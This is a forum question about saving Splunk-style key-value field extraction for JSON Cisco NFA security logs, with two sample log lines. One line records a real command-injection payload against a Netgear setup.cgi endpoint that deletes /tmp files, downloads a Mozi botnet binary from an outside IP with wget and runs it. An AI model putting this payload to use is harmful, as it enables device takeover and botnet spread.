Cisco logs with json format is not extracting properly. I tried from GUI using this kv delims in search and they are working fine.

| kv pairdelim="," kvdelim="=:"

But how can i save them?. Or do we have any alternate way to extract these fields.

2022-01-31T13:11:20.233100-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 16:26:47+00:00", "alert": "http-shell-cmd", "tactic": "Initial Access", "ttp": "Exploit Public-Facing Application", "flow_id": "13847779", "app": "HTTP", "user": "", "s_hg": "China,CHINA UNICOM China169 Backbone", "s_ip": "125.46.191.152", "s_port": 41007, "s_bytes": 245, "s_payload": "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.46.191.152:39222/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1", "p_hg": "Public Space BBT", "p_ip": "74.120.69.217", "p_port": 80, "p_bytes": 303, "p_payload": "301 301 Moved Permanently"}

2022-01-31T13:11:20.202060-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 14:28:58+00:00", "alert": "log4j-shell-recon", "tactic": "Reconnaissance", "ttp": "Gather Victim Host Information", "flow_id": "13842059", "app": "HTTPS", "user": "", "s_hg": "Log4j Watchlist,Brute Force,Apache,Germany,Tor IP,Tor Exit IP", "s_ip": "185.220.101.157", "s_port": 9390, "s_bytes": 820, "s_payload": "............,.lb....Z.....", "p_hg": "Public Space BBT", "p_ip": "74.120.69.238", "p_port": 443, "p_bytes": 1460, "p_payload": "...m..J..4.v.A....\"FJ...:."}